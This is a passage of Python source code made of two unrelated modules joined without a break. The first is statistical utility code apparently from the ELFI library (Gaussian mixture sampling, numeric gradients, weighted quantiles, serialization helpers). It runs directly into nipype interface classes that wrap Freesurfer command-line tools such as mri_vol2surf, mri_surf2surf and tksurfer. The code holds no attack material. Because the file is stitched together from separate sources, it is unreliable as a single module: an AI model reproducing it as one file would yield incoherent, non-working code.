return np.log(cls.pdf(x, means=means, cov=cov, weights=weights))
@classmethod
def rvs(cls, means, cov=1, weights=None, size=1, prior_logpdf=None, random_state=None):
"""Draw random variates from the distribution.
Parameters
----------
means : array_like
Means of the Gaussian mixture components
cov : array_like, optional
A shared covariance matrix for the mixture components
weights : array_like, optional
1d array of weights of the gaussian mixture components
size : int or tuple or None, optional
Number or shape of samples to draw (a single sample has the shape of `means`).
If None, return one sample without an enclosing array.
prior_logpdf : callable, optional
Can be used to check validity of random variable.
random_state : np.random.RandomState, optional
"""
random_state = random_state or np.random
means, weights = cls._normalize_params(means, weights)
if size is None:
size = 1
no_wrap = True
else:
no_wrap = False
output = np.empty((size,) + means.shape[1:])
n_accepted = 0
n_left = size
trials = 0
while n_accepted < size:
inds = random_state.choice(len(means), size=n_left, p=weights)
rvs = means[inds]
perturb = ss.multivariate_normal.rvs(mean=means[0] * 0,
cov=cov,
random_state=random_state,
size=n_left)
x = rvs + perturb
# check validity of x
if prior_logpdf is not None:
x = x[np.isfinite(prior_logpdf(x))]
n_accepted1 = len(x)
output[n_accepted: n_accepted + n_accepted1] = x
n_accepted += n_accepted1
n_left -= n_accepted1
trials += 1
if trials == 100:
logger.warning("SMC: It appears to be difficult to find enough valid proposals "
"with prior pdf > 0. ELFI will keep trying, but you may wish "
"to kill the process and adjust the model priors.")
logger.debug('Needed %i trials to find %i valid samples.', trials, size)
if no_wrap:
return output[0]
else:
return output
@staticmethod
def _normalize_params(means, weights):
means = np.atleast_1d(np.squeeze(means))
if means.ndim > 2:
raise ValueError('means.ndim = {} but must be at most 2.'.format(means.ndim))
if weights is None:
weights = np.ones(len(means))
weights = normalize_weights(weights)
return means, weights
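# A minimal usage sketch for GMDistribution (numbers are illustrative): draw
# from a two-component 1d mixture and evaluate the density at the drawn points.
#
#    means = np.array([0.0, 5.0])
#    samples = GMDistribution.rvs(means, cov=1.0, weights=[0.3, 0.7], size=100)
#    densities = GMDistribution.pdf(samples, means=means, cov=1.0, weights=[0.3, 0.7])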
def numgrad(fn, x, h=None, replace_neg_inf=True):
"""Naive numeric gradient implementation for scalar valued functions.
Parameters
----------
    fn : callable
        Function to differentiate; evaluated at a 2d array of points (one per row)
x : np.ndarray
A single point in 1d vector
h : float or list
Stepsize or stepsizes for the dimensions
replace_neg_inf : bool
Replace neg inf fn values with gradient 0 (useful for logpdf gradients)
Returns
-------
grad : np.ndarray
1D gradient vector
"""
h = 0.00001 if h is None else h
h = np.asanyarray(h).reshape(-1)
x = np.asanyarray(x, dtype=float).reshape(-1)
dim = len(x)
X = np.zeros((dim * 3, dim))
for i in range(3):
Xi = np.tile(x, (dim, 1))
np.fill_diagonal(Xi, Xi.diagonal() + (i - 1) * h)
X[i * dim:(i + 1) * dim, :] = Xi
f = fn(X)
f = f.reshape((3, dim))
if replace_neg_inf:
if np.any(np.isneginf(f)):
return np.zeros(dim)
grad = np.gradient(f, *h, axis=0)
return grad[1, :]
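# Illustrative example: for fn(X) = sum of squares along rows, the numeric
# gradient at x recovers 2 * x up to finite-difference error.
#
#    fn = lambda X: np.sum(X ** 2, axis=1)
#    numgrad(fn, np.array([1.0, -2.0]))   # -> approximately [2.0, -4.0]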
def sample_object_to_dict(data, elem, skip=''):
"""Process data from self object to data dictionary to prepare for json serialization.
Parameters
----------
data : dict, required
Stores collected data for json
elem : dict, required
Default data from Sample object(s)
skip : str, optional
        Some keys in the object should be skipped, such as `outputs` or `populations`.
        The latter is skipped if it has already been processed.
"""
for key, val in elem.__dict__.items():
# skip `outputs` because its values are in `samples` and in `discrepancies`
if key in ['outputs', skip]:
continue
if key == 'meta':
for meta_key, meta_val in elem.__dict__[key].items():
data[meta_key] = meta_val
continue
data[key] = val
def numpy_to_python_type(data):
"""Convert numpy data types to python data type for json serialization.
Parameters
----------
data : dict, required
Stores collected data for json
"""
for key, val in data.items():
        # data may contain keys such as 'samples' whose values are dictionaries
if isinstance(val, dict):
for nested_key, nested_val in val.items():
is_numpy = type(nested_val)
data_type = str(is_numpy)
# check whether the current value has numpy data type
if is_numpy.__module__ == np.__name__:
                    # it is enough to check whether the type name contains one of these substrings
# https://docs.scipy.org/doc/numpy-1.13.0/user/basics.types.html
if 'array' in data_type:
data[key][nested_key] = nested_val.tolist()
elif 'int' in data_type:
data[key][nested_key] = int(nested_val)
elif 'float' in data_type:
data[key][nested_key] = float(nested_val)
is_numpy = type(val)
data_type = str(is_numpy)
if is_numpy.__module__ == np.__name__:
if 'array' in data_type:
data[key] = val.tolist()
elif 'int' in data_type:
data[key] = int(val)
elif 'float' in data_type:
data[key] = float(val)
def weighted_sample_quantile(x, alpha, weights=None):
"""Calculate alpha-quantile of a weighted sample.
Parameters
----------
x : array
One-dimensional sample
alpha : float
Probability threshold for alpha-quantile
weights : array, optional
Sample weights (possibly unnormalized), equal weights by default
Returns
-------
alpha_q : array
alpha-quantile
"""
index = np.argsort(x)
if alpha == 0:
alpha_q = x[index[0]]
else:
if weights is None:
weights = np.ones(len(index))
weights = weights / np.sum(weights)
sorted_weights = weights[index]
cum_weights = np.insert(np.cumsum(sorted_weights), 0, 0)
cum_weights[-1] = 1.0
index_alpha = np.where(np.logical_and(cum_weights[:-1] < alpha,
alpha <= cum_weights[1:]))[0][0]
alpha_q = x[index][index_alpha]
return alpha_q
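# Illustrative example: with equal weights, the 0.5-quantile of [4, 1, 3, 2] is
# 2 (the cumulative weight first reaches 0.5 at the second smallest value).
#
#    weighted_sample_quantile(np.array([4.0, 1.0, 3.0, 2.0]), alpha=0.5)   # -> 2.0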
def flat_array_to_dict(names, arr):
"""Map flat array to a dictionary with parameter names.
Parameters
----------
names: List[string]
parameter names
arr: np.array, shape: (D,)
flat theta array
Returns
-------
Dict
dictionary with named parameters
"""
# res = model.generate(batch_size=1)
# param_dict = {}
# cur_ind = 0
# for param_name in model.parameter_names:
# tensor = res[param_name]
# assert isinstance(tensor, np.ndarray)
# if tensor.ndim == 2:
# dim = tensor.shape[1]
# val = arr[cur_ind:cur_ind + dim]
# cur_ind += dim
# assert isinstance(val, np.ndarray)
# assert val.ndim == 1
# param_dict[param_name] = np.expand_dims(val, 0)
#
# else:
# dim = 1
# val = arr[cur_ind:cur_ind + dim]
# cur_ind += dim
# assert isinstance(val, np.ndarray)
# assert val.ndim == 1
# param_dict[param_name] = val
    # TODO: This approach covers only the case where all parameters
    # are univariate (i.e. scalar and mutually independent) variables.
param_dict = {}
for ii, param_name in enumerate(names):
param_dict[param_name] = np.expand_dims(arr[ii:ii + 1], 0)
return param_dict
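# Illustrative example: flat_array_to_dict(['mu', 'sigma'], np.array([0.5, 1.2]))
# returns {'mu': array([[0.5]]), 'sigma': array([[1.2]])}.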
def resolve_sigmas(parameter_names: List[str],
sigma_proposals: Optional[Dict] = None,
bounds: Optional[Dict] = None) -> List:
"""Map dictionary of sigma_proposals into a list order as parameter_names.
Parameters
----------
parameter_names: List[str]
names of the parameters
sigma_proposals: Dict
non-negative standard deviations for each dimension
{'parameter_name': float}
bounds : Dict, optional
the region where to estimate the posterior for each parameter in
model.parameters
        `{'parameter_name': (lower, upper), ...}`
Returns
-------
List
        list of sigma_proposals in the same order as parameter_names
"""
    if sigma_proposals is None:
        # Derive default proposal scales from the bounds, in parameter order.
        sigma_proposals = []
        for name in parameter_names:
            lower, upper = bounds[name]
            sigma_proposals.append((upper - lower) / 10)
elif isinstance(sigma_proposals, dict):
errmsg = "sigma_proposals' keys have to be identical to " \
"target_model.parameter_names."
        if len(sigma_proposals) != len(parameter_names):
raise ValueError(errmsg)
        try:
            sigma_proposals = [sigma_proposals[x] for x in parameter_names]
        except KeyError:
            raise ValueError(errmsg)
else:
raise ValueError("If provided, sigma_proposals need to be input as a dict.")
return sigma_proposals
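# Illustrative examples: an explicit dict is reordered to match parameter_names,
# and omitting sigma_proposals derives defaults from the widths of the bounds.
#
#    resolve_sigmas(['a', 'b'], sigma_proposals={'b': 0.2, 'a': 0.1})   # -> [0.1, 0.2]
#    resolve_sigmas(['a'], bounds={'a': (0.0, 1.0)})                    # -> [0.1]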
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""Interfaces to assorted Freesurfer utility programs.
Change directory to provide relative paths for doctests
>>> import os
>>> filepath = os.path.dirname( os.path.realpath( __file__ ) )
>>> datadir = os.path.realpath(os.path.join(filepath, '../../testing/data'))
>>> os.chdir(datadir)
"""
__docformat__ = 'restructuredtext'
import os
import re
from nipype.utils.filemanip import fname_presuffix, split_filename
from nipype.interfaces.freesurfer.base import FSCommand, FSTraitedSpec
from nipype.interfaces.base import TraitedSpec, File, traits, OutputMultiPath, isdefined, CommandLine, CommandLineInputSpec
filemap = dict(cor='cor', mgh='mgh', mgz='mgz', minc='mnc',
afni='brik', brik='brik', bshort='bshort',
spm='img', analyze='img', analyze4d='img',
bfloat='bfloat', nifti1='img', nii='nii',
niigz='nii.gz')
filetypes = ['cor', 'mgh', 'mgz', 'minc', 'analyze',
'analyze4d', 'spm', 'afni', 'brik', 'bshort',
'bfloat', 'sdt', 'outline', 'otl', 'gdf',
'nifti1', 'nii', 'niigz']
class SampleToSurfaceInputSpec(FSTraitedSpec):
source_file = File(exists=True, mandatory=True, argstr="--mov %s",
desc="volume to sample values from")
reference_file = File(exists=True, argstr="--ref %s",
desc="reference volume (default is orig.mgz)")
hemi = traits.Enum("lh", "rh", mandatory=True, argstr="--hemi %s",
desc="target hemisphere")
surface = traits.String(argstr="--surf %s", desc="target surface (default is white)")
reg_xors = ["reg_file", "reg_header", "mni152reg"]
reg_file = File(exists=True, argstr="--reg %s", mandatory=True, xor=reg_xors,
desc="source-to-reference registration file")
reg_header = traits.Bool(argstr="--regheader %s", requires=["subject_id"],
mandatory=True, xor=reg_xors,
desc="register based on header geometry")
mni152reg = traits.Bool(argstr="--mni152reg",
mandatory=True, xor=reg_xors,
desc="source volume is in MNI152 space")
apply_rot = traits.Tuple(traits.Float, traits.Float, traits.Float,
argstr="--rot %.3f %.3f %.3f",
desc="rotation angles (in degrees) to apply to reg matrix")
apply_trans = traits.Tuple(traits.Float, traits.Float, traits.Float,
argstr="--trans %.3f %.3f %.3f",
desc="translation (in mm) to apply to reg matrix")
override_reg_subj = traits.Bool(argstr="--srcsubject %s", requires=["subject_id"],
desc="override the subject in the reg file header")
sampling_method = traits.Enum("point", "max", "average",
mandatory=True, argstr="%s", xor=["projection_stem"],
requires=["sampling_range", "sampling_units"],
desc="how to sample -- at a point or at the max or average over a range")
sampling_range = traits.Either(traits.Float,
traits.Tuple(traits.Float, traits.Float, traits.Float),
desc="sampling range - a point or a tuple of (min, max, step)")
sampling_units = traits.Enum("mm", "frac", desc="sampling range type -- either 'mm' or 'frac'")
projection_stem = traits.String(mandatory=True, xor=["sampling_method"],
desc="stem for precomputed linear estimates and volume fractions")
smooth_vol = traits.Float(argstr="--fwhm %.3f", desc="smooth input volume (mm fwhm)")
smooth_surf = traits.Float(argstr="--surf-fwhm %.3f", desc="smooth output surface (mm fwhm)")
interp_method = traits.Enum("nearest", "trilinear", argstr="--interp %s",
desc="interpolation method")
cortex_mask = traits.Bool(argstr="--cortex", xor=["mask_label"],
desc="mask the target surface with hemi.cortex.label")
mask_label = File(exists=True, argstr="--mask %s", xor=["cortex_mask"],
desc="label file to mask output with")
float2int_method = traits.Enum("round", "tkregister", argstr="--float2int %s",
desc="method to convert reg matrix values (default is round)")
fix_tk_reg = traits.Bool(argstr="--fixtkreg", desc="make reg matrix round-compatible")
subject_id = traits.String(desc="subject id")
target_subject = traits.String(argstr="--trgsubject %s",
desc="sample to surface of different subject than source")
surf_reg = traits.Bool(argstr="--surfreg", requires=["target_subject"],
desc="use surface registration to target subject")
ico_order = traits.Int(argstr="--icoorder %d", requires=["target_subject"],
desc="icosahedron order when target_subject is 'ico'")
reshape = traits.Bool(argstr="--reshape", xor=["no_reshape"],
desc="reshape surface vector to fit in non-mgh format")
no_reshape = traits.Bool(argstr="--noreshape", xor=["reshape"],
desc="do not reshape surface vector (default)")
reshape_slices = traits.Int(argstr="--rf %d", desc="number of 'slices' for reshaping")
scale_input = traits.Float(argstr="--scale %.3f",
desc="multiple all intensities by scale factor")
frame = traits.Int(argstr="--frame %d", desc="save only one frame (0-based)")
out_file = File(argstr="--o %s", genfile=True, desc="surface file to write")
out_type = traits.Enum(filetypes, argstr="--out_type %s", desc="output file type")
hits_file = traits.Either(traits.Bool, File(exists=True), argstr="--srchit %s",
desc="save image with number of hits at each voxel")
    hits_type = traits.Enum(filetypes, argstr="--srchit_type %s", desc="hits file type")
vox_file = traits.Either(traits.Bool, File, argstr="--nvox %s",
desc="text file with the number of voxels intersecting the surface")
class SampleToSurfaceOutputSpec(TraitedSpec):
out_file = File(exists=True, desc="surface file")
hits_file = File(exists=True, desc="image with number of hits at each voxel")
vox_file = File(exists=True,
desc="text file with the number of voxels intersecting the surface")
class SampleToSurface(FSCommand):
"""Sample a volume to the cortical surface using Freesurfer's mri_vol2surf.
You must supply a sampling method, range, and units. You can project
either a given distance (in mm) or a given fraction of the cortical
thickness at that vertex along the surface normal from the target surface,
and then set the value of that vertex to be either the value at that point
or the average or maximum value found along the projection vector.
By default, the surface will be saved as a vector with a length equal to the
number of vertices on the target surface. This is not a problem for Freesurfer
programs, but if you intend to use the file with interfaces to another package,
you must set the ``reshape`` input to True, which will factor the surface vector
into a matrix with dimensions compatible with proper Nifti files.
Examples
--------
>>> import nipype.interfaces.freesurfer as fs
>>> sampler = fs.SampleToSurface(hemi="lh")
>>> sampler.inputs.source_file = "cope1.nii.gz"
>>> sampler.inputs.reg_file = "register.dat"
>>> sampler.inputs.sampling_method = "average"
>>> sampler.inputs.sampling_range = 1
>>> sampler.inputs.sampling_units = "frac"
>>> res = sampler.run() # doctest: +SKIP
"""
_cmd = "mri_vol2surf"
input_spec = SampleToSurfaceInputSpec
output_spec = SampleToSurfaceOutputSpec
filemap = dict(cor='cor', mgh='mgh', mgz='mgz', minc='mnc',
afni='brik', brik='brik', bshort='bshort',
spm='img', analyze='img', analyze4d='img',
bfloat='bfloat', nifti1='img', nii='nii',
niigz='nii.gz')
def _format_arg(self, name, spec, value):
if name == "sampling_method":
range = self.inputs.sampling_range
units = self.inputs.sampling_units
if units == "mm":
units = "dist"
if isinstance(range, tuple):
range = "%.3f %.3f %.3f" % range
else:
range = "%.3f" % range
method = dict(point="", max="-max", average="-avg")[value]
return "--proj%s%s %s" % (units, method, range)
if name == "reg_header":
return spec.argstr % self.inputs.subject_id
if name == "override_reg_subj":
return spec.argstr % self.inputs.subject_id
if name in ["hits_file", "vox_file"]:
return spec.argstr % self._get_outfilename(name)
return super(SampleToSurface, self)._format_arg(name, spec, value)
def _get_outfilename(self, opt="out_file"):
outfile = getattr(self.inputs, opt)
if not isdefined(outfile) or isinstance(outfile, bool):
if isdefined(self.inputs.out_type):
if opt == "hits_file":
suffix = '_hits.' + self.filemap[self.inputs.out_type]
else:
suffix = '.' + self.filemap[self.inputs.out_type]
elif opt == "hits_file":
suffix = "_hits.mgz"
else:
suffix = '.mgz'
outfile = fname_presuffix(self.inputs.source_file,
newpath=os.getcwd(),
prefix=self.inputs.hemi + ".",
suffix=suffix,
use_ext=False)
return outfile
def _list_outputs(self):
outputs = self._outputs().get()
outputs["out_file"] = os.path.abspath(self._get_outfilename())
        hitsfile = self.inputs.hits_file
        if isdefined(hitsfile):
            # Resolve a boolean hits_file to a generated filename before reporting it.
            if isinstance(hitsfile, bool):
                hitsfile = self._get_outfilename("hits_file")
            outputs["hits_file"] = hitsfile
voxfile = self.inputs.vox_file
if isdefined(voxfile):
if isinstance(voxfile, bool):
voxfile = fname_presuffix(self.inputs.source_file,
newpath=os.getcwd(),
prefix=self.inputs.hemi + ".",
suffix="_vox.txt",
use_ext=False)
outputs["vox_file"] = voxfile
return outputs
def _gen_filename(self, name):
if name == "out_file":
return self._list_outputs()[name]
return None
class SurfaceSmoothInputSpec(FSTraitedSpec):
in_file = File(mandatory=True, argstr="--sval %s", desc="source surface file")
subject_id = traits.String(mandatory=True, argstr="--s %s", desc="subject id of surface file")
hemi = traits.Enum("lh", "rh", argstr="--hemi %s", mandatory=True, desc="hemisphere to operate on")
fwhm = traits.Float(argstr="--fwhm %.4f", xor=["smooth_iters"],
desc="effective FWHM of the smoothing process")
smooth_iters = traits.Int(argstr="--smooth %d", xor=["fwhm"],
desc="iterations of the smoothing process")
cortex = traits.Bool(True, argstr="--cortex", usedefault=True, desc="only smooth within $hemi.cortex.label")
reshape = traits.Bool(argstr="--reshape",
desc="reshape surface vector to fit in non-mgh format")
out_file = File(argstr="--tval %s", genfile=True, desc="surface file to write")
class SurfaceSmoothOutputSpec(TraitedSpec):
out_file = File(exists=True, desc="smoothed surface file")
class SurfaceSmooth(FSCommand):
"""Smooth a surface image with mri_surf2surf.
    The surface is smoothed by an iterative process of averaging the
value at each vertex with those of its adjacent neighbors. You may supply
either the number of iterations to run or a desired effective FWHM of the
smoothing process. If the latter, the underlying program will calculate
the correct number of iterations internally.
.. seealso::
SmoothTessellation() Interface
For smoothing a tessellated surface (e.g. in gifti or .stl)
Examples
--------
>>> import nipype.interfaces.freesurfer as fs
>>> smoother = fs.SurfaceSmooth()
>>> smoother.inputs.in_file = "lh.cope1.mgz"
>>> smoother.inputs.subject_id = "subj_1"
>>> smoother.inputs.hemi = "lh"
>>> smoother.inputs.fwhm = 5
>>> smoother.run() # doctest: +SKIP
"""
_cmd = "mri_surf2surf"
input_spec = SurfaceSmoothInputSpec
output_spec = SurfaceSmoothOutputSpec
def _list_outputs(self):
outputs = self._outputs().get()
outputs["out_file"] = self.inputs.out_file
if not isdefined(outputs["out_file"]):
in_file = self.inputs.in_file
if isdefined(self.inputs.fwhm):
kernel = self.inputs.fwhm
else:
kernel = self.inputs.smooth_iters
outputs["out_file"] = fname_presuffix(in_file,
suffix="_smooth%d" % kernel,
newpath=os.getcwd())
return outputs
def _gen_filename(self, name):
if name == "out_file":
return self._list_outputs()[name]
return None
class SurfaceTransformInputSpec(FSTraitedSpec):
source_file = File(exists=True, mandatory=True, argstr="--sval %s",
xor=['source_annot_file'],
desc="surface file with source values")
source_annot_file = File(exists=True, mandatory=True,
argstr="--sval-annot %s",
xor=['source_file'],
desc="surface annotation file")
source_subject = traits.String(mandatory=True, argstr="--srcsubject %s",
desc="subject id for source surface")
hemi = traits.Enum("lh", "rh", argstr="--hemi %s", mandatory=True,
desc="hemisphere to transform")
target_subject = traits.String(mandatory=True, argstr="--trgsubject %s",
desc="subject id of target surface")
target_ico_order = traits.Enum(1, 2, 3, 4, 5, 6, 7,
argstr="--trgicoorder %d",
desc=("order of the icosahedron if "
"target_subject is 'ico'"))
source_type = traits.Enum(filetypes, argstr='--sfmt %s',
requires=['source_file'],
desc="source file format")
target_type = traits.Enum(filetypes, argstr='--tfmt %s',
desc="output format")
reshape = traits.Bool(argstr="--reshape",
desc="reshape output surface to conform with Nifti")
    reshape_factor = traits.Int(argstr="--reshape-factor %d",
desc="number of slices in reshaped image")
out_file = File(argstr="--tval %s", genfile=True,
desc="surface file to write")
class SurfaceTransformOutputSpec(TraitedSpec):
out_file = File(exists=True, desc="transformed surface file")
class SurfaceTransform(FSCommand):
"""Transform a surface file from one subject to another via a spherical registration.
Both the source and target subject must reside in your Subjects Directory,
and they must have been processed with recon-all, unless you are transforming
to one of the icosahedron meshes.
Examples
--------
>>> from nipype.interfaces.freesurfer import SurfaceTransform
>>> sxfm = SurfaceTransform()
>>> sxfm.inputs.source_file = "lh.cope1.nii.gz"
>>> sxfm.inputs.source_subject = "my_subject"
>>> sxfm.inputs.target_subject = "fsaverage"
>>> sxfm.inputs.hemi = "lh"
>>> sxfm.run() # doctest: +SKIP
"""
_cmd = "mri_surf2surf"
input_spec = SurfaceTransformInputSpec
output_spec = SurfaceTransformOutputSpec
def _list_outputs(self):
outputs = self._outputs().get()
outputs["out_file"] = self.inputs.out_file
if not isdefined(outputs["out_file"]):
source = self.inputs.source_file
# Some recon-all files don't have a proper extension (e.g. "lh.thickness")
# so we have to account for that here
bad_extensions = [".%s" % e for e in ["area", "mid", "pial", "avg_curv", "curv", "inflated",
"jacobian_white", "orig", "nofix", "smoothwm", "crv",
"sphere", "sulc", "thickness", "volume", "white"]]
use_ext = True
if split_filename(source)[2] in bad_extensions:
source = source + ".stripme"
use_ext = False
ext = ""
if isdefined(self.inputs.target_type):
ext = "." + filemap[self.inputs.target_type]
use_ext = False
outputs["out_file"] = fname_presuffix(source,
suffix=".%s%s" % (self.inputs.target_subject, ext),
newpath=os.getcwd(),
use_ext=use_ext)
else:
outputs["out_file"] = os.path.abspath(self.inputs.out_file)
return outputs
def _gen_filename(self, name):
if name == "out_file":
return self._list_outputs()[name]
return None
class Surface2VolTransformInputSpec(FSTraitedSpec):
source_file = File(exists=True, argstr='--surfval %s',
copyfile=False, mandatory=True,
desc='This is the source of the surface values')
hemi = traits.Str(argstr='--hemi %s', mandatory=True,
desc='hemisphere of data')
transformed_file = File(name_template="%s_asVol.nii", desc='Output volume',
argstr='--outvol %s',
name_source=['source_file'], hash_files=False)
reg_file = File(exists=True, argstr='--volreg %s',
mandatory=True,
desc='tkRAS-to-tkRAS matrix (tkregister2 format)',
xor=['subject_id'])
template_file = File(exists=True, argstr='--template %s',
desc='Output template volume')
mkmask = traits.Bool(desc='make a mask instead of loading surface values',
argstr='--mkmask')
vertexvol_file = File(name_template="%s_asVol_vertex.nii",
desc=('Path name of the vertex output volume, which '
'is the same as output volume except that the '
'value of each voxel is the vertex-id that is '
'mapped to that voxel.'),
argstr='--vtxvol %s', name_source=['source_file'],
hash_files=False)
surf_name = traits.Str(argstr='--surf %s',
desc='surfname (default is white)')
projfrac = traits.Float(argstr='--projfrac %s', desc='thickness fraction')
subjects_dir = traits.Str(argstr='--sd %s',
desc=('freesurfer subjects directory defaults to '
'$SUBJECTS_DIR'))
    subject_id = traits.Str(argstr='--identity %s', desc='subject id',
xor=['reg_file'])
class Surface2VolTransformOutputSpec(TraitedSpec):
transformed_file = File(exists=True,
desc='Path to output file if used normally')
vertexvol_file = File(desc='vertex map volume path id. Optional')
class Surface2VolTransform(FSCommand):
"""Use FreeSurfer mri_surf2vol to apply a transform.
Examples
--------
>>> from nipype.interfaces.freesurfer import Surface2VolTransform
>>> xfm2vol = Surface2VolTransform()
>>> xfm2vol.inputs.source_file = 'lh.cope1.mgz'
>>> xfm2vol.inputs.reg_file = 'register.mat'
>>> xfm2vol.inputs.hemi = 'lh'
>>> xfm2vol.inputs.template_file = 'cope1.nii.gz'
>>> xfm2vol.inputs.subjects_dir = '.'
>>> xfm2vol.cmdline
'mri_surf2vol --hemi lh --volreg register.mat --surfval lh.cope1.mgz --sd . --template cope1.nii.gz --outvol lh.cope1_asVol.nii --vtxvol lh.cope1_asVol_vertex.nii'
>>> res = xfm2vol.run()# doctest: +SKIP
"""
_cmd = 'mri_surf2vol'
input_spec = Surface2VolTransformInputSpec
output_spec = Surface2VolTransformOutputSpec
class ApplyMaskInputSpec(FSTraitedSpec):
in_file = File(exists=True, mandatory=True, position=-3, argstr="%s",
desc="input image (will be masked)")
mask_file = File(exists=True, mandatory=True, position=-2, argstr="%s",
desc="image defining mask space")
out_file = File(genfile=True, position=-1, argstr="%s",
desc="final image to write")
xfm_file = File(exists=True, argstr="-xform %s",
desc="LTA-format transformation matrix to align mask with input")
invert_xfm = traits.Bool(argstr="-invert", desc="invert transformation")
xfm_source = File(exists=True, argstr="-lta_src %s", desc="image defining transform source space")
xfm_target = File(exists=True, argstr="-lta_dst %s", desc="image defining transform target space")
use_abs = traits.Bool(argstr="-abs", desc="take absolute value of mask before applying")
mask_thresh = traits.Float(argstr="-T %.4f", desc="threshold mask before applying")
class ApplyMaskOutputSpec(TraitedSpec):
out_file = File(exists=True, desc="masked image")
class ApplyMask(FSCommand):
"""Use Freesurfer's mri_mask to apply a mask to an image.
The mask file need not be binarized; it can be thresholded above a given
value before application. It can also optionally be transformed into input
space with an LTA matrix.
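Example
-------
A minimal usage sketch; the filenames below are placeholders.
>>> from nipype.interfaces.freesurfer import ApplyMask
>>> masker = ApplyMask(in_file='structural.nii', mask_file='mask.mgz') # doctest: +SKIP
>>> res = masker.run() # doctest: +SKIP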
"""
_cmd = "mri_mask"
input_spec = ApplyMaskInputSpec
output_spec = ApplyMaskOutputSpec
def _list_outputs(self):
outputs = self._outputs().get()
outputs["out_file"] = self.inputs.out_file
if not isdefined(outputs["out_file"]):
outputs["out_file"] = fname_presuffix(self.inputs.in_file,
suffix="_masked",
newpath=os.getcwd(),
use_ext=True)
else:
outputs["out_file"] = os.path.abspath(outputs["out_file"])
return outputs
def _gen_filename(self, name):
if name == "out_file":
return self._list_outputs()[name]
return None
class SurfaceSnapshotsInputSpec(FSTraitedSpec):
subject_id = traits.String(position=1, argstr="%s", mandatory=True,
desc="subject to visualize")
hemi = traits.Enum("lh", "rh", position=2, argstr="%s", mandatory=True,
desc="hemisphere to visualize")
surface = traits.String(position=3, argstr="%s", mandatory=True,
desc="surface to visualize")
show_curv = traits.Bool(argstr="-curv", desc="show curvature", xor=["show_gray_curv"])
show_gray_curv = traits.Bool(argstr="-gray", desc="show curvature in gray", xor=["show_curv"])
overlay = File(exists=True, argstr="-overlay %s", desc="load an overlay volume/surface",
requires=["overlay_range"])
reg_xors = ["overlay_reg", "identity_reg", "mni152_reg"]
overlay_reg = traits.File(exists=True, argstr="-overlay-reg %s", xor=reg_xors,
desc="registration matrix file to register overlay to surface")
identity_reg = traits.Bool(argstr="-overlay-reg-identity", xor=reg_xors,
desc="use the identity matrix to register the overlay to the surface")
mni152_reg = traits.Bool(argstr="-mni152reg", xor=reg_xors,
desc="use to display a volume in MNI152 space on the average subject")
overlay_range = traits.Either(traits.Float,
traits.Tuple(traits.Float, traits.Float),
traits.Tuple(traits.Float, traits.Float, traits.Float),
desc="overlay range--either min, (min, max) or (min, mid, max)",
argstr="%s")
overlay_range_offset = traits.Float(argstr="-foffset %.3f",
desc="overlay range will be symettric around offset value")
truncate_overlay = traits.Bool(argstr="-truncphaseflag 1",
desc="truncate the overlay display")
reverse_overlay = traits.Bool(argstr="-revphaseflag 1",
desc="reverse the overlay display")
invert_overlay = traits.Bool(argstr="-invphaseflag 1",
desc="invert the overlay display")
demean_overlay = traits.Bool(argstr="-zm", desc="remove mean from overlay")
annot_file = File(exists=True, argstr="-annotation %s", xor=["annot_name"],
desc="path to annotation file to display")
annot_name = traits.String(argstr="-annotation %s", xor=["annot_file"],
desc="name of annotation to display (must be in $subject/label directory")
label_file = File(exists=True, argstr="-label %s", xor=["label_name"],
desc="path to label file to display")
label_name = traits.String(argstr="-label %s", xor=["label_file"],
desc="name of label to display (must be in $subject/label directory")
colortable = File(exists=True, argstr="-colortable %s", desc="load colortable file")
label_under = traits.Bool(argstr="-labels-under", desc="draw label/annotation under overlay")
label_outline = traits.Bool(argstr="-label-outline", desc="draw label/annotation as outline")
patch_file = File(exists=True, argstr="-patch %s", desc="load a patch")
orig_suffix = traits.String(argstr="-orig %s", desc="set the orig surface suffix string")
sphere_suffix = traits.String(argstr="-sphere %s", desc="set the sphere.reg suffix string")
show_color_scale = traits.Bool(argstr="-colscalebarflag 1",
desc="display the color scale bar")
show_color_text = traits.Bool(argstr="-colscaletext 1",
desc="display text in the color scale bar")
six_images = traits.Bool(desc="also take anterior and posterior snapshots")
screenshot_stem = traits.String(desc="stem to use for screenshot file names")
stem_template_args = traits.List(traits.String, requires=["screenshot_stem"],
desc="input names to use as arguments for a string-formated stem template")
tcl_script = File(exists=True, argstr="%s", genfile=True,
desc="override default screenshot script")
class SurfaceSnapshotsOutputSpec(TraitedSpec):
snapshots = OutputMultiPath(File(exists=True),
desc="tiff images of the surface from different perspectives")
class SurfaceSnapshots(FSCommand):
"""Use Tksurfer to save pictures of the cortical surface.
By default, this takes snapshots of the lateral, medial, ventral,
and dorsal surfaces. See the ``six_images`` option to add the
anterior and posterior surfaces.
You may also supply your own tcl script (see the Freesurfer wiki for
information on scripting tksurfer). The screenshot stem is set as the
environment variable "_SNAPSHOT_STEM", which you can use in your
own scripts.
Note that this interface will not run if you do not have graphics
enabled on your system.
Examples
--------
>>> import nipype.interfaces.freesurfer as fs
>>> shots = fs.SurfaceSnapshots(subject_id="fsaverage", hemi="lh", surface="pial")
>>> shots.inputs.overlay = "zstat1.nii.gz"
>>> shots.inputs.overlay_range = (2.3, 6)
>>> shots.inputs.overlay_reg = "register.dat"
>>> res = shots.run() # doctest: +SKIP
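To supply your own tcl script instead of the default one (a sketch; the
script name is a placeholder):
>>> shots.inputs.tcl_script = 'my_snapshots.tcl' # doctest: +SKIP
>>> res = shots.run() # doctest: +SKIP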
"""
_cmd = "tksurfer"
input_spec = SurfaceSnapshotsInputSpec
output_spec = SurfaceSnapshotsOutputSpec
def _format_arg(self, name, spec, value):
if name == "tcl_script":
if not isdefined(value):
return "-tcl snapshots.tcl"
else:
return "-tcl %s" % value
elif name == "overlay_range":
if isinstance(value, float):
return "-fthresh %.3f" % value
else:
if len(value) == 2:
return "-fminmax %.3f %.3f" % value
else:
return "-fminmax %.3f %.3f -fmid %.3f" % (value[0], value[2], value[1])
elif name == "annot_name" and isdefined(value):
# Matching annot by name needs to strip the leading hemi and trailing
# extension strings
if value.endswith(".annot"):
value = value[:-6]
if re.match("%s[\.\-_]" % self.inputs.hemi, value[:3]):
value = value[3:]
return "-annotation %s" % value
return super(SurfaceSnapshots, self)._format_arg(name, spec, value)
def _run_interface(self, runtime):
if not isdefined(self.inputs.screenshot_stem):
stem = "%s_%s_%s" % (
self.inputs.subject_id, self.inputs.hemi, self.inputs.surface)
else:
stem = self.inputs.screenshot_stem
